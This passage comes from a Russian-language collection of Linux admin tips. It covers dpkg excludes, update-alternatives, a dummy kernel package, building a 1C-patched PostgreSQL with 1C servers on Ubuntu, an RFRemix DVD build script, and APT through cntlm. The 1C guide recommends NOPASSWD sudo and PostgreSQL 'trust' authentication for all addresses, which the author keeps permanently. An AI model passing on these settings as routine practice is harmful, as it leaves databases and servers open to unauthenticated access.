publican_2.1-2.debian.tar.gz publican_2.1-2rh1_i386.changes publican_2.1-2.dsc publican_2.1-2rh1_source.changes publican_2.1-2rh1_all.deb publican_2.1.orig.tar.gz publican_2.1-2rh1.debian.tar.gz

Экономия дискового пространства путем исключения маловажных файлов через dpkg (доп. ссылка 1) [комментарии]

В составе большинства deb-пакетов содержатся данные, которые никогда не понадобятся пользователю, например, файлы с переводами элементов интерфейса на другие языки или документация. Начиная с версии 1.15.8 в dpkg появилась возможность не устанавливать лишние данные. Для контроля за тем, какую информацию установить, а какую нет, предусмотрены две опции: --path-include=маска и --path-exclude=маска. В качестве маски могут быть использованы любые glob-выражения, допустимые в shell (man glob). Так как обычно для установки используются высокоуровневые утилиты, подобные apt, вызывать dpkg вручную и задавать дополнительные опции не совсем удобно. Поэтому логичнее изменить методику вызова dpkg в системе, создав соответствующую инструкцию в каталоге /etc/dpkg/dpkg.cfg.d/. Например, создадим файл etc/dpkg/dpkg.cfg.d/excludes, в котором зададим маски для включаемых и исключаемых каталогов, на примере ограничения установки локалей и системных руководств: # Не устанавливаем локали за исключением русских: path-exclude=/usr/share/locale/* path-include=/usr/share/locale/ru/* path-include=/usr/share/locale/locale.alias # Не устанавливаем переводы системных руководств, за исключением перевода на русский язык path-exclude=/usr/share/man/* path-include=/usr/share/man/man[1-9]/* path-include=/usr/share/man/ru*/* Следует иметь в виду, что все ранее установленные части пакета, подпадающие под маску исключения, будут удалены только после обновления пакета. Т.е. если необходимо освободить место немедленно, не дожидаясь появления обновлений, можно инициировать переустановку всех пакетов в системе: aptitude reinstall или apt-get --reinstall install

Настройка альтернатив в Debian на примере смены браузера по-умолчанию в GNOME (доп. ссылка 1) Автор: Сергей Афонькин [комментарии]

В GNOME браузером по-умолчанию является Epiphany и если открывать html-файлы с диска, то они откроются в Epiphany. Для того, чтобы файлы открывались в Iceweasel (Firefox) достаточно в командной строке выполнить: sudo update-alternatives --config gnome-www-browser 1 /usr/bin/iceweasel * 2 /usr/bin/epiphany-gecko 3 /usr/bin/konqueror 4 /usr/bin/midori 5 /usr/bin/opera 6 /usr/bin/google-chrome Отобразились 2 альтернативы, выступающие в роли "gnome-www-browser". Нажмите enter, чтобы сохранить значение по умолчанию "*", или введите выбранное число: вводим цифру 1 и нажимаем Enter. Можно также задать браузер для X-ов, следующей командой: sudo update-alternatives --config x-www-browser Другие полезные альтернативы (полный список можно посмотреть в директории /etc/alternatives/): update-alternatives --list java update-alternatives --list editor update-alternatives --list pager update-alternatives --list ftp Для установки альтернативы для определенной группы можно использовать такую команду: update-alternatives --set editor /usr/bin/emacs в данном случае устанавливаем в качестве текстового редактора по умолчанию emacs Для добавления собственной альтернативы можно использовать команду: update-alternatives --install /usr/bin/vi2 editor /usr/local/bin/vim2 50 где, имя итогового альтернативного файла /usr/bin/vi2, editor - имя группы, /usr/local/bin/vim2 - путь к добавляемой в число альтернатив программе, 50 - приоритет. Для удаления: update-alternatives --remove editor /usr/bin/vi2

Обновление Fedora/RHEL/Suse/Mandriva без обновления ядер Автор: Artem Tashkinov [комментарии]

Очень многие пользователи и системные администраторы используют дистрибутивы Fedora/RHEL/Suse/Mandriva с ядром собственной сборки и поэтому обновление или установка ядра от вендора не является желанным. Избежать установки ядер при обновлении можно следующим образом. Создайте файл kernel.spec, определяющий пакет с заведомо более новой фиктивной версией ядра, (данный вариант на 100% работает только на Fedora/RHEL) со следующим содержимым: Name: kernel Summary: The Linux kernel Version: 2.6.100 Release: 1 License: GPLv2+ Group: System Environment/Kernel URL: http://www.kernel.org/ Packager: Artem S. Tashkinov %description The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. %prep %build %install %clean %files %changelog * Thu Jul 8 2010 Artem S. Tashkinov <birdie@permonline.ru> 2.6.100 - First indefinite release (unless kernel developers change kernel versioning) Затем соберите и установите его с помощью следующих команд: $ rpm -ba kernel.spec $ rpm -ivh ~/rpmbuild/RPMS/`rpm --eval '%_target_cpu'`/kernel-2.6.100-1.i686.rpm

Установка сервера для 1С:Предприятия 8 и PostgreSQL 8.4 на Ubuntu 10.04 LTS Автор: Игорь Вершинин [комментарии]

Задача, казалось, несложной - необходимо установить выделенный сервер на новой версии Ubuntu, самостоятельно скомпилировать PostgreSQL из исходников, установить далее две версии серверной части 1С:Предприятия 8.1 и 8.2. Но, при решении задачи всплыло много нюансов. Брать готовый бинарник от EterSoft'а оказалось неверным - общая компиляция под Mandriva, затем препарирование полученного через alien. Нарушается логика расположения файлов конфигурации и библиотек в Ubuntu, плюс отставание от текущего положения дел (уже вышла версия 8.4.4 PostgreSQL, а на ftp.etersoft.ru лежит лишь 8.4.2). Я понимаю, что лучшее враг хорошего, но хочется самому делать выводы, что лучшее, и что хорошее. Поэтому принято решение самостоятельно собрать PostgreSQL с необходимыми патчами. Серверные части 1С:Предприятия также написаны в расчете на некий средне-универсальный дистрибутив Linux, но тут хотя бы честно. Все ставится в /opt, конфигурационные файлы прописываются в /etc/init.d и домашней директории пользователя usr1cv82(1). Да и изменить мы ничего не можем - доступа к исходникам нет. Итак. Собираем сам сервер. Корпус, материнская плата, процессор, планки памяти, два одинаковых жестких диска... Я собрал программный RAID1 (зеркало) для надежности хранения (все-таки собирается для "продакшн"), но это совершенно не обязательно. Что обязательно - установка 64-битной версии, объем оперативной памяти для любой СУБД критичен (а 32-битные версии ограничены 4 гигабайтами), благо это сейчас совершенно недорого. Я установил 8 гигабайт. В общем, выбирайте сами. Привод оптических дисков в сервер ставить смысла нет никакого, загрузку можно провести через USB flash, а на будущее выделенному серверу привод совершенно ни к чему - все необходимое докачивается из репозитариев или копируется через утилиту scp. Скачиваем образ сервера с http://www.ubuntu.com, там же подробнейшая инструкция как сделать загружаемую USB flash из-под любой операционной системы. Загружаемся, инсталлируем. Несколько обязательный комментариев. В принципе, ничего сложного в процессе инсталляции нет, все подробно расписано. Но! * Выбираем обязательно русский язык, чтобы сервер автоматически настроился на использование русской локали (принципиально для первоначального запуска патченной версии PostgreSQL, да и системные сообщения на русском не лишние) * Обязательное подключение к Интернету. По ходу дела, программа инсталляции несколько раз докачивает недостающие пакеты, плюс нам нужен доступ к репозитариям для дальнейшей работы. * В момент попытки получения ip-адреса по dhcp процедуру лучше прервать (особенно если в это время в сети работает dhcp-сервер) или на следующем экране выбрать "Возврат". Все-таки сервер, должен иметь фиксированный адрес и имя. Задаем его самостоятельно. * Из предлагаемого дополнительного софта ставим лишь OpenSSH, остальное после и самостоятельно. После инсталляции перезагрузка, вытаскиваем "флэшку" (она больше не нужна), не забываем в BIOS'е установить AHCI - жесткие диски работают быстрее. После новой установки первым делом: sudo apt-get install mc Надо как-то работать в консоли. Затем: sudo visudo (или воспользуемся редактором из mc) Добавляем директиву NOPASSWD:ALL для группы %admin, приведя последнюю строку к виду: %admin ALL=(ALL) NOPASSWD:ALL Это нам необходимо, чтобы каждый раз не вводить свой пароль для sudo. Так как к консоли сервера кроме администратора никто доступ не имеет (теоретически), то и безопасность это не нарушает. Правилом хорошего тона считается разлогинится после работы. А доступ к консоли без знания пароля получить нельзя, так что если кто и узнает ваш пароль, то и команду sudo выполнит легко. Таким образом, ничего кроме дополнительной потери времени и нервов постоянное парольное подтверждение не дает. Обновляем установку: apt-get update apt-get upgrade Перезагружаемся, потому как ядро обновится на более свежее. Устанавливаем NTP-сервер. Время на всех серверах должно быть синхронизировано, иначе в логах потом не разберешься. apt-get install ntp В /etc/ntp.conf исправляем строку "server ntp.ubuntu.com" на вашу. Если в локальной сети есть уже работающий сервер времени (у нас это сервер, отвечающий за proxy), то укажите его адрес. Через некоторое время сервер синхронизирует время. Если нет, оставьте, пусть компании Canonical будет приятно. Подготовительные работы окончены. Приступаем к сборке. Скачиваем с http://v8.1c.ru/overview/postgres_patches_notes.htm три патча: 1c_FULL_84-0.19.2.patch postgresql-1c-8.4.patch applock-1c-8.4.1.patch Пусть вас не смущает то, что патчи для версии 8.4.1 - они отлично становятся и на более старшие версии PostgreSQL (в рамках версии 8.4). Все минорные исправления не затрагивают того, что патчит фирма "1С". На сервере в домашнем каталоге пользователя-администратора создаем директорию "1С". Копируем в нее любым удобным для нас способом (я использовал scp со своей рабочей станции, можно перекинуть через собственный ftp или через "флэшку") эти три патча. Переименовываем их, добавляя перед названием "20-", "21-" и "22-", т. е. приводим их к виду: 20-1c_FULL_84-0.19.2.patch, 21-postgresql-1c-8.4.patch, 22-applock-1c-8.4.1.patch Переходим в директорию "1С" и скачиваем туда исходники PostgreSQL: apt-get source postgresql После скачивания архивы автоматически распакуются, будут наложены специфичные для Ubuntu патчи (что очень хорошо, так как итоговая сборка будет "родной"). Входим в этот каталог. Затем копируем наши патчи в каталог "/debian/patches/". Далее нам предстоит исправить три файла, ответственных за правильную сборку пакета. Все три файла содержаться в каталоге "debian". Файл "changelog". Отвечает за правильное наименование пакетов после сборки. Добавляем туда следующие строки в начало файла любым текстовым редактором (например, через mc): postgresql-8.4 (18.4.4-ailant-0ubuntu10.04) lucid; urgency=low * Apply 1C patch for PostgreSQL (from 8.4.1 version) - add mchar, fulleq, fasttrun -- Igor Vershinin <ivershinin@ailant.com.ru> Fri, 04 Jun 2010 00:53:03 +0400 Версию устанавливаем как 18.4.4, чтобы в дальнейшем она самостоятельно не обновилась при апдейте системы. Если будут наши исправления, то всегда возможно скачать новые исходники и повторить с ними операцию, описанную в этой статье, увеличив номер сборки (например, 18.4.4-ailant-1ubuntu10.04). Следующий файл "control". Необходимо добавить зависимость от библиотеки "libicu42" (требуется для патча от "1С"). В секции "Build-Depends" (в начале файла) в конце списка добавляем ", libicu-dev". Целиком строка будет выглядеть вот так: bison, flex, docbook-utils, openjade, docbook, libicu-dev И последний файл "postgresql-contrib-8.4.install". В него необходимо добавить строки с именами 1С-овских модулей: mchar, fulleq и fasttrun. После строк: usr/lib/postgresql/8.4/lib/pg_stat_statements.so usr/lib/postgresql/8.4/lib/citext.so usr/lib/postgresql/8.4/lib/btree_gin.so надо добавить: usr/lib/postgresql/8.4/lib/mchar.so usr/lib/postgresql/8.4/lib/fulleq.so usr/lib/postgresql/8.4/lib/fasttrun.so На этом операцию по адаптации можно считать законченной. У нас получился правильно "патченный", родной для операционной системы исходник. Аналогично можно подготовить версию для любой debian-совместимой ОС. К сожалению, исправления трех файлов (кроме последнего) нельзя сделать через patch-файл в автоматическом режиме. Патчи применяются уже после того, как скачиваются зависимости и определяется имя пакета. Готовые патчи и исправленные файлы можно взять также на нашем ftp-сайте ftp://ftp.ailant.com.ru/pub/soft/postgresql-8.4.4-1C-ubuntu/ . Там же в каталоге bin лежит собранный пакет PostgreSQL для Ubuntu 10.04 (x86_64). Это если кому не хочется самостоятельно собирать. Компиляция может пройти двумя способами. Оба несложных. В первом случае идем "в лоб" и компилируем в рабочей системе, но куча зависимостей будет загружена, что не есть хорошо, для "продакш"-системы. Поэтому воспользуемся пакетом "pbuilder". В этом случае компиляция будет проходить в специально созданном chroot-окружении, и все изменения будут проходить в нем, не трогая рабочую систему. Более подробно об этом можно почитать в https://wiki.ubuntu.com/PbuilderHowto apt-get install pbuilder cdbs Все, что ему необходимо, он сам вытянет по зависимостям. Второй пакет необходим для компиляции. Далее: pbuilder create Создаем специальное окружение для компиляции. В этот момент много скачивается из репозиториев. У меня с первого раза почему-то не сработало, был сбой и pbuilder закончил работу с ошибкой. Я не стал разбираться отчего это произошло, просто повторно выполнил команду создания. В дальнейшем рекомендуется перед сборкой давать команду: pbuilder update для обновления окружения новыми пакетами. Переходим в каталог исходников и pdebuild Сборка началась. В первый раз по зависимостям будет вытянуто около 500 мегабайт, надо быть к этому готовым. Либо собирать на unlim-канале (дома, например). В дальнейшем пакеты кешируются. У нас используется пакет apt-proxy, который также умеет это делать. Для предприятий, где работает не один сервер, очень рекомендую. Сборка проходит ровно и спокойно. По окончанию в каталоге "/var/cache/pbuilder/result" будут лежать собранные пакеты. Продолжаем. Необходимо установить несколько пакетов для поддержки работы PostgreSQL: apt-get install postgresql-common postgresql-client-common libicu42 libossp-uuid16 Затем, собственно, ставим свежесобранный PostgreSQL: dpkg -i libpq5_18.4.4-ailant-0ubuntu10.04_amd64.deb dpkg -i libpgtypes3_18.4.4-ailant-0ubuntu10.04_amd64.deb dpkg -i postgresql-client-8.4_18.4.4-ailant-0ubuntu10.04_amd64.deb dpkg -i postgresql-8.4_18.4.4-ailant-0ubuntu10.04_amd64.deb dpkg -i postgresql-contrib-8.4_18.4.4-ailant-0ubuntu10.04_amd64.deb Остальные пакеты не нужны для работы "1С:Предприятия 8". В этот момент сервер СУБД будет запущен, также будет проведена первичная инициализация базы данных. Осталось сделать несколько штрихов. Проверим, чтобы PostgreSQL всегда запускался после перезагрузки: update-rc.d postgresql-8.4 defaults Сделаем два симлинка, без которых "1С:Предприятие" не сможет работать с СУБД: ln -s /usr/lib/locale/en_US.utf8 /usr/lib/locale/en_US ln -s /usr/share/locale/en /usr/share/locale/en_US Временно (правда, у меня осталось на постоянно) исправим правила доступа к СУБД. В конфигурационном файле "/etc/postgresql/8.4/main/pg_hba.conf" исправим в строке "host all all 0.0.0.0/0" md5 на trust. На момент начальной отладки так гораздо проще, в дальнейшем (после запуска всей системы) выбирайте сами уровень собственной защиты. Все PostgreSQL собран и запущен. Устанавливаем "1С:Предприятие". Так как в настоящее время версия 8.2 является основной, то начнем с нее. После установим версию 8.1 для поддержки старых конфигураций (которые еще не перевели на новую платформу). Переписываем с диска ИТС (скачиваем с сайта 1С) последнюю версию (на момент написания статьи это 8.2.11.229) для архитектуры debian x86_64 (ведь именно этот сервер мы ставили). Копируем на нашем сервере в папку "1С" в домашней директории. Последовательно запускаем: dpkg -i 1c-enterprise82-common_8.2.11-229_amd64.deb dpkg -i 1c-enterprise82-server_8.2.11-229_amd64.deb В принципе, достаточно. Пакеты "-nls" - это языковая поддержка. Нам она не нужна, русский язык есть в основной поставке. Пакет "-ws" - это веб-сервисы. Если нужны, то поставьте. Мне пока без надобности. После инсталляции надо проверить наличие пользователя user1cv82 в файле /etc/passwd и его домашнего каталога в /home. Именно в нем и будут храниться специфические параметры запуска сервера. Дальше необходимо доставить несколько пакетов: apt-get install imagemagick msttfcorefonts libgsf-1-114 texlive-binaries Проверяем все ли библиотеки установлены: /opt/1c/v8.2/x86_64/utils/config_server Утилита должна отработать без сообщений. Если написала, что что-то не установлено, надо доставить. Обычно она указывает не на название пакетов, а на недостающие файлы. Узнать в каком они пакете можно через "apt-file search". Делаем возможность запуска после перезагрузки и запускаем: update-rc.d srv1cv82 defaults invoke-rc.d srv1cv82 start Должно быть "ОК". Если нет, то скорее всего необходимые порты уже заняты. Надо проверить чем. Дальше проверяем, что все процессы запущены нормально: ps aux | grep 1c От имени пользователя "usr1cv82" должно быть запущено три процесса: ragent, rmngr и rphost. После имен процессов идут номера портов, на которых они работают. Если процесса не три, а один (такое почему-то иногда бывает, но только при первоначальном запуске), то делаем: invoke-rc.d srv1cv82 stop Удаляем каталог ".1cv82" в домашней директории пользователя usr1cv82. И перезапускаем сервер заново. Должно стать все нормально. Аналогично устанавливаем и сервер "1С:Предприятия 8.1". Но с небольшими изменениями. Во-первых, из-за ошибки скрипта домашний каталог пользователя "usr1cv81" будет установлен неверно, необходимо исправить его, отредактировав "/etc/passwd" и исправив путь на "/home/usr1cv81", по аналогии с пользователем "usr1cv82". Затем создать собственно сам каталог в директории "home" и установить на него владельца "usr1cv81" и группу "grp1cv81". Во-вторых, необходимо исправить порты, на которых будет работать сервер. Редактируем "/etc/init.d/srv1cv81", убирая комментарии со строк и добавляя номера: SRV1CV8_PORT=11540 SRV1CV8_REGPORT=11541 SRV1CV8_RANGE=11560:11691 т. е. мы использовали порты на 10000 больше, чем порты по умолчанию. Дальше запускаем сервер, проверяем, если надо удаляем директорию ".1cv81" в домашнем каталоге пользователя usr1cv81. Потом тестовая перезагрузка. Готово. На выделенном сервере работает самостоятельно собранная версия PostgreSQL, а также два сервера "1С:Предприятия" версий 8.1 и 8.2. Работоспособность проверяется с любой windows-машины, подключением консоли серверов "1С:Предприятия" к нашему серверу на заданный порт (1540 или 11540). Кстати, при использовании в конфигурациях "1С:Предприятия 8" управляемых блокировок, скорость работы СУБД PostgreSQL в ряде случаев бывает даже выше, чем у MS SQL (под которую изначально и был заточен 1С). Но это все относится к правильной оптимизации запросов, которые в версии 8.2 можно очень гибко настраивать. И последнее. Несмотря на то, что сейчас все наши сервера работают под Ubuntu, раньше использовалась Fedora. Пример сборки для нее (и похожих дистрибутивов) есть в каталоге ftp://ftp.ailant.com.ru/pub/soft/postgresql-8.3.7-1C-fedora/ . Там лежит как пример готовый spec-файл для сборки. Собирается все через mock (http://fedoraproject.org/wiki/Projects/Mock). Дополнение: Компилировать PostgreSQL необходимо с ключом "--disable-integer-datetimes", иначе при загрузке данных в СУБД через 1С:Предприятие 8 может вылететь ошибка про timestamp. Плюс вышло обновление патча 0.19.3 от 1С с небольшим инзменением,вместо (строка 2118): +LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE; используется +LANGUAGE C RETURNS NULL ON NULL INPUT VOLATILE;

Автоматизированная сборка загрузочного DVD из CD-образов Russian Fedora 13 Автор: Igor [комментарии]

Ниже представлен вариант автоматизированной сборки DVD из CD-образов Russian Remix Fedora (RFRemix). Тестировалось под OS RFRemix 11 и RFRemix 12. Изложенные в инструкции действия следует выполнять под пользователем root. Создаем каталог куда копируем 6-ть образов CD (закачены с yandex): RFRemix-13-i386-disc1.iso RFRemix-13-i386-disc2.iso RFRemix-13-i386-disc3.iso RFRemix-13-i386-disc4.iso RFRemix-13-i386-disc5.iso RFRemix-13-i386-disc6.iso В каталоге создаем bash-скрипт MakeDVD.sh со следующим содержимым: #!/bin/bash #Script create DVD ISO-image from CD ISO-images for Fedora 13 RFREMIX13_MEDIA_ID="1274745691.442497" MAX_DISC_NUM=6 RFREMIX_DISC_NAME="RFRemix-13-i386-disc" COMPS_FILE="RFRemix-13-comps.xml" RPM_DIR="Packages" DVD_LABEL="RFRemix 13" RFRENIX_VER11=`((cat /etc/system-release) | awk '{ if(match($0,"11")!=0) print "11" }')` RFRENIX_VER12=`((cat /etc/system-release) | awk '{ if(match($0,"12")!=0) print "12" }')` CURDIR="$(pwd)" COMPSFILE=$CURDIR"/srcdvd/repodata/"$COMPS_FILE SRCDVDDIR="$CURDIR""/srcdvd" DVDISOFILE="$CURDIR""/dvd-iso/RFRemix-13-i386-DVD.iso" cleandata() { echo echo 'Cleaning temporary data...' echo for ((i=1;i<=$MAX_DISC_NUM;i++)) ; do if [ -a ./mnt/disc$i ]; then umount -f ./mnt/disc$i ; fi done rm -f -R ./mnt rm -f -R ./srcdvd } echo echo 'Create directories...' echo cleandata rm -f -R ./dvd-iso mkdir ./srcdvd mkdir ./dvd-iso mkdir ./mnt for ((i=1;i<=$MAX_DISC_NUM;i++)) ; do mkdir ./mnt/disc$i ; done echo echo 'Mount a CD ISO-image...' echo for ((i=1;i<=$MAX_DISC_NUM;i++)) ; do mount -t iso9660 ./$RFREMIX_DISC_NAME$i.iso ./mnt/disc$i -o loop ; done echo echo 'Data preparation...' echo echo 'Copying packages from disc 1...' cp -f -R ./mnt/disc1/* ./srcdvd cp -f ./mnt/disc1/.discinfo ./srcdvd rm -f ./srcdvd/repodata/* cp ./mnt/disc1/repodata/*-comps.xml ./srcdvd/repodata/$COMPS_FILE rm -f `(find ./srcdvd/*.TBL ./srcdvd/ | grep .TBL)` for ((i=2;i<=$MAX_DISC_NUM;i++)) ; do echo 'Copying packages from disc '$i'...'; cp ./mnt/disc$i/$RPM_DIR/* ./srcdvd/$RPM_DIR; done if [ "v"$RFRENIX_VER12 == "v12" ] && [ ! -e /usr/lib/python2.6/site-packages/createrepo/createrepo_rfremix12.patch ]; then echo echo 'Patching utility createrepo...' echo cp -f ./createrepo_rfremix12.patch /usr/lib/python2.6/site-packages/createrepo cp /usr/lib/python2.6/site-packages/createrepo/__init__.py /usr/lib/python2.6/site-packages/createrepo/__init__OLD.py patch -i /usr/lib/python2.6/site-packages/createrepo/createrepo_rfremix12.patch /usr/lib/python2.6/site-packages/createrepo/__init__.py fi if [ "v"$RFRENIX_VER11 == "v11" ] && [ ! -e /usr/lib/python2.6/site-packages/createrepo/createrepo.patch ]; then echo echo 'Patching utility createrepo...' echo cp -f ./createrepo.patch /usr/lib/python2.6/site-packages/createrepo cp /usr/lib/python2.6/site-packages/createrepo/__init__.py /usr/lib/python2.6/site-packages/createrepo/__init__OLD.py patch -i /usr/lib/python2.6/site-packages/createrepo/createrepo.patch /usr/lib/python2.6/site-packages/createrepo/__init__.py fi echo echo 'Creation of information repositories...' echo createrepo -g "$COMPSFILE" --baseurl "media://"$RFREMIX13_MEDIA_ID -d -o "$SRCDVDDIR" "$SRCDVDDIR" echo echo 'Checksum repodata/repomd.xml...' echo SHA256REPO=`(sha256sum ./srcdvd/repodata/repomd.xml) | awk '{ print $1 }'` REPOINFO="repodata/repomd.xml = sha256:""$SHA256REPO" (cat ./mnt/disc1/.treeinfo) | awk '{ if(match($0,"repodata")==0) print; else print "'"$REPOINFO"'" }' > ./srcdvd/.treeinfo echo echo 'Creating a bootable DVD ISO-image...' echo mkisofs -r -T -joliet-long -V "$DVD_LABEL" -b isolinux/isolinux.bin -c isolinux/boot.cat \ -no-emul-boot -boot-load-size 4 -boot-info-table -o "$DVDISOFILE" "$SRCDVDDIR" 2> ./make_iso.log cleandata ls -l ./dvd-iso echo echo 'Create DVD ISO completed!' echo В каталоге размещаем два patch-файла для createrepo (пакет должен быть установлен). Патчи необходимы, иначе мы получим пропуск некоторых rpm-пакетов. Файл createrepo.patch (для RFRemix 11): *** ./__init__.py 2010-05-29 22:51:15.000000000 +0300 --- ./__init__update.py 2010-05-30 07:26:02.000000000 +0300 *************** *** 72,78 **** self.oldpackage_paths = [] # where to look for the old packages - self.deltafile = 'prestodelta.xml.gz' self.num_deltas = 1 # number of older versions to delta (max) ! self.max_delta_rpm_size = 100000000 self.update_md_path = None self.skip_stat = False self.database = False --- 72,78 ---- self.oldpackage_paths = [] # where to look for the old packages - self.deltafile = 'prestodelta.xml.gz' self.num_deltas = 1 # number of older versions to delta (max) ! self.max_delta_rpm_size = 1000000000L self.update_md_path = None self.skip_stat = False self.database = False *************** *** 588,594 **** """ # duck and cover if the pkg.size is > whatever ! if int(pkg.size) > self.conf.max_delta_rpm_size: if not self.conf.quiet: self.callback.log("Skipping %s package " \ "that is > max_delta_rpm_size" % pkg) --- 588,594 ---- """ # duck and cover if the pkg.size is > whatever ! if long(pkg.size) > self.conf.max_delta_rpm_size: if not self.conf.quiet: self.callback.log("Skipping %s package " \ "that is > max_delta_rpm_size" % pkg) *************** *** 638,644 **** for d in self.conf.oldpackage_paths: for f in self.getFileList(d, 'rpm'): fp = d + '/' + f ! if int(os.stat(fp)[stat.ST_SIZE]) > self.conf.max_delta_rpm_size: self.callback.log("Skipping %s package " \ "that is > max_delta_rpm_size" % f) continue --- 638,644 ---- for d in self.conf.oldpackage_paths: for f in self.getFileList(d, 'rpm'): fp = d + '/' + f ! if long(os.stat(fp)[stat.ST_SIZE]) > self.conf.max_delta_rpm_size: self.callback.log("Skipping %s package " \ "that is > max_delta_rpm_size" % f) continue Файл createrepo_rfremix12.patch (для RFRemix 12): *** ./__init__.py 2010-05-30 09:28:40.000000000 +0300 --- ./__init__update_f12.py 2010-05-30 09:38:01.000000000 +0300 *************** *** 74,80 **** self.oldpackage_paths = [] # where to look for the old packages - self.deltafile = 'prestodelta.xml.gz' self.num_deltas = 1 # number of older versions to delta (max) ! self.max_delta_rpm_size = 100000000 self.update_md_path = None self.skip_stat = False self.database = False --- 74,80 ---- self.oldpackage_paths = [] # where to alook for the old packages - self.deltafile = 'prestodelta.xml.gz' self.num_deltas = 1 # number of older versions to delta (max) ! self.max_delta_rpm_size = 1000000000L self.update_md_path = None self.skip_stat = False self.database = False *************** *** 613,619 **** """ drpm_pkg_time = time.time() # duck and cover if the pkg.size is > whatever ! if int(pkg.size) > self.conf.max_delta_rpm_size: if not self.conf.quiet: self.callback.log("Skipping %s package " \ "that is > max_delta_rpm_size" % pkg) --- 613,619 ---- """ drpm_pkg_time = time.time() # duck and cover if the pkg.size is > whatever ! if long(pkg.size) > self.conf.max_delta_rpm_size: if not self.conf.quiet: self.callback.log("Skipping %s package " \ "that is > max_delta_rpm_size" % pkg) *************** *** 671,677 **** for f in self.getFileList(d, 'rpm'): fp = d + '/' + f fpstat = os.stat(fp) ! if int(fpstat[stat.ST_SIZE]) > self.conf.max_delta_rpm_size: self.callback.log("Skipping %s package " \ "that is > max_delta_rpm_size" % f) continue --- 671,677 ---- for f in self.getFileList(d, 'rpm'): fp = d + '/' + f fpstat = os.stat(fp) ! if long(fpstat[stat.ST_SIZE]) > self.conf.max_delta_rpm_size: self.callback.log("Skipping %s package " \ "that is > max_delta_rpm_size" % f) continue Установить атрибут MakeDVD.sh на выполнение. Запустить файл MakeDVD.sh. В каталоге dvd-iso получим DVD ISO-образ Russian Remix Fedora 13. Исходники скрипта и патчей.

Анализ содержимого DEB-пакетов (доп. ссылка 1) [комментарии]

Наиболее простым способом просмотра содержимого как установленного, так и не установленного, DEB-пакета является использование утилиты apt-file. Устанавливаем: sudo apt-get install apt-file sudo apt-file update Выводим список файлов для любого установленного пакета или пакета из репозитория, в отличие от "dpkg -L" установка пакета для его анализа не обязательна, выборка производится на основе сохраненных индексов: apt-file list имя_пакета например: apt-file list wget Ищем в состав какого пакета входит заданный файл: apt-file search /usr/bin/ldd apt-file search libUil.so точное соответствие (-x - использовать perl-совместимые регулярные выражения): apt-file -x search '^/bin/ls$' или используем более замысловатую выборку по маске apt-file search "/(usr/bin/vim|sbin/lvm)" для просмотра содержимого локально скопированного пакета, отсутствующего в репозитории, можно использовать команду: dpkg-deb -c file.deb

Организация работы APT через NTLM-proxy Автор: deathmokar [комментарии]

APT (aptitude, apt-get) не проходит в интернет напрямую через MS ISA (proxy). Проблема в NTLM авторизации от MS. В сети можно найти описание решения (http://michaelcarden.net/blog/index.php?p=58) через задействование локального прокси-сервера ntlmaps, но работать этот метод отказался. Решение нашлось на сайте http://cntlm.sourceforge.net/ Конфигурационный файл данного прокси крайне прост (/etc/cntlm.conf): Username - имя пользователя для ISA Domain - имя MS-домена Password - пароль Proxy - сервер ISA (ip или имя) и его порт (8080) Остальное не трогал. Например: Username myname Domain MYDOMAIN Password mypass #Workstation - не понадобилось Proxy proxy.mynet.com:8080 После правки перезапускаем прокси: /etc/init.d/cntlm restart Сам APT направляем на него так: touch /etc/apt/apt.config.d/proxy В любом редакторе правим файл до состояния: Acquire::http::Proxy "http://127.0.0.1:3128/"; Acquire::ftp::Proxy "ftp://127.0.0.1

Как сформировать установочный iso-образ RHEL заданным набором пакетов (доп. ссылка 1) [комментарии]

Инструкция по подготовке загрузочного ISO собственной комплектации на базе RHEL 5.x или CentOS 5.x. Создаваемый диск будет содержать только набор пакетов, установленных в текущей системе. 1. Загружаем iso-образ загрузочного DVD и сохраняем их в /tmp 2. Создаем базовую директорию mkdir -p /build/rhel52 3. Монтируем ISO mount -oloop /tmp/rhel-5-server-x86_64-dvd.iso /mnt 4. Копируем файлы с DVD в директорию /build/rhel52 rsync -rv /mnt/* /build/rhel52 cp /mnt/.discinfo /build/rhel52 cp /mnt/.treeinfo /build/rhel52 5. На текущей системе, содержание которой нам необходимо повторить в создаваемом ISO, генерируем список пакетов: rpm -qa --queryformat '%{name},%{version}-%{release},%{arch}\n' | sort -n > /tmp/rhel5.2-rpm 6. Добавляем окончание .rpm к элементам сформированного списка: cat /tmp/rhel5.2-rpm | sed 's/$/.rpm/g' > /build/rhel52/rhel52-list 7. Создаем список RPM, находящихся на примонтированном DVD: ls -1 /build/rhel52/Server > /build/rhel52/rhel52-all 8. Генерируем список пакетов, которые нам не нужны: diff -uNr /build/rhel52/rhel52-list /build/rhel52/rhel52-all | grep ^+ > /build/rhel52/remove-list 9. Удаляем первые три строки из файла rhel52-all (удаляем первую строку и файлы TRANS.TBL и repodata): vi /build/rhel52-all 10. Создаем скрипт для удаления ненужных файлов #!/bin/ksh #uncomment the next line for troubleshooting #set -x LINES=`cat remove-list | wc -l` LINE_NO=1 while [ $LINE_NO -le $LINES ] do BADFILE=`sed -n "${LINE_NO}p" remove-list` rm -f /build/rhel52/Server/$BADFILE LINE_NO=`expr $LINE_NO + 1 ` done 11. Обновляем индексные файлы на DVD, учтя удаленные пакеты: createrepo -g /build/rhel52/Server/repodata/comps-rhel5-server-core.xml /build/rhel52/Server 12. Создаем директорию для дополнительных пакетов, которые нам хочется сохранить на установочном носителе: mkdir /build/rhel52/addons 15. Копируем дополнительные пакеты: cp /pathtofiles/addons/* /build/rhel52/addons/ 13. Копируем типовой kickstart-файл из текущей системы: cp kickstart_file /build/rhel52 14. Заменяем если в kickstart-файле "--url http://" на "cdrom" После секции %post добавляем: %post --nochroot mount /tmp/cdrom /mnt/sysimage/mnt Заменяем "/bin/rpm -Uhv http://" на "/bin/rpm -Uhv /mnt/addons/", чтобы ставить файлы не из web, а их локальной директории addons. Также заменяем все упоминания wget на директорию addons. 15. Для удобства установки в /build/rhel52/isolinux/boot.msg добавляем подсказку по вызову kickstart-конфигурации "ks=cdrom:/rhel52.ks.cfg" 16. Создаем загрузочный ISO: mkisofs -r -T -J -V "RHEL52 DVD" -b isolinux/isolinux.bin -c isolinux/boot.cat \ -no-emul-boot -boot-load-size 4 -boot-info-table -o /tmp/rhel52.iso /build/rhel52

Создание локального зеркала Debian (apt-mirror + ProFTPd + Apache2) Автор: Yuri Rybnikov [комментарии]

